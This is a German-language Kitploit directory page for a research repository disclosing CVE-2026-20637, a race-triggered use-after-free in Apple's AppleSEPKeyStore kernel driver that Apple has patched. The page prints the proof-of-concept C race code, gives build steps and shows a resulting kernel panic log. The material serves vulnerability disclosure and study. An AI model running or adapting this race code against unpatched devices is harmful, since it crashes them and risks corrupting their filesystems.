Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-20637-AppleSEPKeyStore-UAF — CVE-2026-20637: AppleSEPKeyStore Use-After-Free — Kernel-Schwachstelle in iOS/macOS (behoben in 26.4) | Kitploit
Tools/GitHubGitHub/enfilade-labs/cve-2026-20637-applesepkeystore-uaf
iOS-SicherheitSchwachstellenanalyseExploitationMobile SicherheitBinary-Exploitation
GitHubenfilade-labs/cve-2026-20637-applesepkeystore-uaf

CVE-2026-20637-AppleSEPKeyStore-UAF

CVE-2026-20637: AppleSEPKeyStore Use-After-Free — Kernel-Schwachstelle in iOS/macOS (behoben in 26.4)

Repository anzeigen

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
19vor 4 MonatenNoch nicht geprüft
Teilen

CVE-2026-20637 — AppleSEPKeyStore Use-After-Free

CVE-2026-20637 · Enfilade · enfilade.io

Komponente: AppleKeyStore

Auswirkung: Eine App kann möglicherweise einen unerwarteten Systemabsturz verursachen.

Beschreibung: Ein Use-After-Free-Problem wurde durch verbessertes Speichermanagement behoben.

— Apple Security Content, iOS 26.3 und iPadOS 26.3

Ziel

iOS26.1 – 26.2 (getestet)
macOS26.1 – 26.2 (getestet)
Komponentecom.apple.driver.AppleSEPKeyStore
GepatchtiOS 26.3 / iPadOS 26.3

Apple hat dies möglicherweise schrittweise zwischen 26.2.1 und 26.3 gepatcht, sodass Zwischenversionen das Problem möglicherweise nicht reproduzieren.

Warnung

Das Ausführen des PoC führt zu einem Kernel-Panic auf dem Gerät. Speichern Sie Ihre Arbeit, bevor Sie es ausführen. Wiederholte Panics können zu Dateisystemkorruption führen. Nur für Sicherheitsforschungszwecke.

Schwachstelle

Use-after-free in IOCommandGate, ausgelöst durch einen AppleKeyStore-Race. Acht Caller-Threads hämmern IOConnectCallMethod auf Selektoren 0–15, während vier Closer-Threads mit IOServiceClose konkurrieren, wodurch ein Zeitfenster entsteht, in dem auf das Command Gate zugegriffen wird, nachdem es freigegeben wurde.

Proof of Concept

root@kitploit:~
#define AKS_SERVICE_NAME "AppleKeyStore"
#define NUM_CALLERS      8
#define NUM_CLOSERS      4
#define NUM_ITERATIONS   100000

static _Atomic(io_connect_t) g_conn = IO_OBJECT_NULL;

// 8 Caller-Threads: IOConnectCallMethod hämmern (hohe Priorität)
while (!done) {
    io_connect_t conn = atomic_load(&g_conn);
    if (conn == IO_OBJECT_NULL) continue;
    for (uint32_t sel = 0; sel < 16; sel++) {
        IOConnectCallMethod(conn, sel, scalars, 6, NULL, 0, NULL, NULL, NULL, NULL);
    }
}

// 4 Closer-Threads: IOServiceClose-Race (hohe Priorität)
while (!done) {
    io_connect_t conn = atomic_load(&g_conn);
    if (conn == IO_OBJECT_NULL) continue;
    IOServiceClose(conn);
    atomic_store(&g_conn, IO_OBJECT_NULL);
}

// Haupt-Thread: 100k Verbindungen, keine Verzögerung
for (int i = 0; i < NUM_ITERATIONS; i++) {
    uint32_t type = (i % 4 == 0) ? 0x2022
                  : (i % 4 == 1) ? 0xbeef
                  : (i % 4 == 2) ? 0x1337
                                 : 0x4141;
    IOServiceOpen(svc, mach_task_self(), type, &conn);
    atomic_store(&g_conn, conn);
    // KEINE VERZÖGERUNG — enges Race-Fenster
}

Build & Ausführung

  1. Öffnen Sie ios-app/Test.xcodeproj in Xcode.
  2. Wählen Sie ein physisches iOS-Gerät aus (der Simulator erreicht den Treiber nicht).
  3. Bauen, ausführen und den PoC aus der App auslösen.

Panic-Log

root@kitploit:~
panic(cpu 4 caller 0xfffffff015b84ae0): [iokit.IOCommandGate]: element modified after free
  (off:72, val:0xfffffffffffffe00, sz:80, ptr:0xffffffe69b7d0db0)
   72: 0xfffffffffffffe00

Kernel version: Darwin Kernel Version 25.1.0: Thu Oct 23 11:09:22 PDT 2025;
  root:xnu-12377.42.6~55/RELEASE_ARM64_T8030

Panicked task 0xffffffe5b4f1e820: pid 956: Test

Kernel Extensions in backtrace:
   com.apple.driver.AppleSEPKeyStore(2.0)[AD3CDADB-06B6-32F5-9E47-9889901353CA]
      @0xfffffff016a47020->0xfffffff016a84f9f

Lizenz

Siehe LICENSE.

Tool herunterladen